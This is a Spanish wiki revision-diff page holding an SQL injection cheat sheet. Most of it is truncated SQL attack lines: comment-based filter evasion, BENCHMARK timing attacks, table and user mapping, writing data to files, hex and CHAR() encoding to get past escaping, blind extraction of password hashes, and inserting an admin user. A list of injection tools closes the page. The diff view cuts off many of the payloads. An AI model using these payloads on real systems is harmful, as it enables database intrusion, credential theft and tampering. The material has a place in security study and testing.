meta data de esta página
Diferencias
Muestra las diferencias entre dos versiones de la página.
Ambos lados, revisión anteriorRevisión previaPróxima revisión | Revisión previa | ||
seguridad:sql_injection [2013/03/18 09:46] – lc | seguridad:sql_injection [2023/01/18 14:11] (actual) – editor externo 127.0.0.1 | ||
---|---|---|---|
Línea 9: | Línea 9: | ||
* %0D | * %0D | ||
</ | </ | ||
- | < | + | |
+ | === Técnicas extraidas | ||
<code sql> | <code sql> | ||
1 SELECT * FROM login /* foobar */ | 1 SELECT * FROM login /* foobar */ | ||
Línea 73: | Línea 74: | ||
2 SELECT ROUND(23.298, | 2 SELECT ROUND(23.298, | ||
</ | </ | ||
- | < | + | < |
Misc | Misc | ||
1 SELECT LENGTH(COMPRESS(REPEAT(' | 1 SELECT LENGTH(COMPRESS(REPEAT(' | ||
2 SELECT MD5(' | 2 SELECT MD5(' | ||
</ | </ | ||
- | < | + | < |
Benchmark | Benchmark | ||
01 SELECT BENCHMARK(10000000, | 01 SELECT BENCHMARK(10000000, | ||
Línea 94: | Línea 95: | ||
Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | Beware of of the N rounds, add an extra zero and it could stall or crash your browser! | ||
Gathering info | Gathering info | ||
- | < | + | < |
Table mapping | Table mapping | ||
1 SELECT COUNT(*) FROM tablename | 1 SELECT COUNT(*) FROM tablename | ||
</ | </ | ||
- | < | + | < |
Field mapping | Field mapping | ||
1 SELECT * FROM tablename WHERE user LIKE " | 1 SELECT * FROM tablename WHERE user LIKE " | ||
Línea 105: | Línea 106: | ||
4 SELECT * FROM tablename WHERE user = ' | 4 SELECT * FROM tablename WHERE user = ' | ||
</ | </ | ||
- | < | + | < |
User mapping | User mapping | ||
1 SELECT * FROM tablename WHERE email = ' | 1 SELECT * FROM tablename WHERE email = ' | ||
Línea 111: | Línea 112: | ||
3 SELECT * FROM tablename WHERE user = ' | 3 SELECT * FROM tablename WHERE user = ' | ||
</ | </ | ||
- | < | + | < |
Advanced SQL vectors | Advanced SQL vectors | ||
Writing info into files. | Writing info into files. | ||
1 SELECT password FROM tablename WHERE username = ' | 1 SELECT password FROM tablename WHERE username = ' | ||
</ | </ | ||
- | < | + | < |
Writing info into files without single quotes: (example) | Writing info into files without single quotes: (example) | ||
1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | 1 SELECT password FROM tablename WHERE username = CONCAT(CHAR(39), | ||
Línea 123: | Línea 124: | ||
Note: You must specify a new file, it may not exists and give the correct pathname. | Note: You must specify a new file, it may not exists and give the correct pathname. | ||
</ | </ | ||
- | < | + | < |
The CHAR() quoteless function. | The CHAR() quoteless function. | ||
1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT * FROM login WHERE user = CONCAT(CHAR(39), | ||
Línea 130: | Línea 131: | ||
4 SELECT * FROM login WHERE user = CHAR(39, | 4 SELECT * FROM login WHERE user = CHAR(39, | ||
</ | </ | ||
- | < | + | < |
Extracting hashes | Extracting hashes | ||
1 SELECT user FROM login WHERE user = ' | 1 SELECT user FROM login WHERE user = ' | ||
Línea 140: | Línea 141: | ||
The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | The way to extract hashes is done this way if single quotes are allowed, see beneath it a quoteless example. | ||
- | < | + | < |
01 SELECT user FROM login WHERE user = ' | 01 SELECT user FROM login WHERE user = ' | ||
02 UNION SELECT IF(SUBSTRING(pass, | 02 UNION SELECT IF(SUBSTRING(pass, | ||
Línea 154: | Línea 155: | ||
</ | </ | ||
A quoteless example: | A quoteless example: | ||
- | < | + | < |
1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | 1 SELECT user FROM login WHERE user = CONCAT(CHAR(39), | ||
2 UNION SELECT IF(SUBSTRING(pass, | 2 UNION SELECT IF(SUBSTRING(pass, | ||
Línea 162: | Línea 163: | ||
Misc. | Misc. | ||
Insert a new user into DB | Insert a new user into DB | ||
- | < | + | < |
1 INSERT INTO login SET user = ' | 1 INSERT INTO login SET user = ' | ||
</ | </ | ||
Línea 171: | Línea 172: | ||
Write the DB user away into tmp | Write the DB user away into tmp | ||
- | < | + | < |
Change admin e-mail, for " | Change admin e-mail, for " | ||
Línea 181: | Línea 182: | ||
Using an HEX encoded query to bypass escaping. | Using an HEX encoded query to bypass escaping. | ||
- | < | + | < |
1 Normal: SELECT * FROM login WHERE user = ' | 1 Normal: SELECT * FROM login WHERE user = ' | ||
2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | 2 Bypass: SELECT * FROM login WHERE user = 0x726F6F74 | ||
Línea 191: | Línea 192: | ||
</ | </ | ||
How to determin the HEX value for injection. | How to determin the HEX value for injection. | ||
- | < | + | < |
With comments. | With comments. | ||
Línea 204: | Línea 205: | ||
- | === Herramientas === | + | ==== Herramientas |
- | Havij -> http:// | + | |
+ | * Havij http:// | ||
+ | * PonyMagic http:// | ||
+ | * General Injection Explorer | ||
+ | * Safe 3 sql injector http:// | ||
+ | * Enema http:// | ||
+ | * Absinthe http:// | ||
+ | * Pangolin http:// | ||
+ | * sql poison | ||
+ | * sql map gui | ||
+ | * bsql hacker http:// | ||
+ | * | ||
Línea 211: | Línea 223: | ||
==== Referencias ==== | ==== Referencias ==== | ||
* http:// | * http:// | ||
+ | * http:// |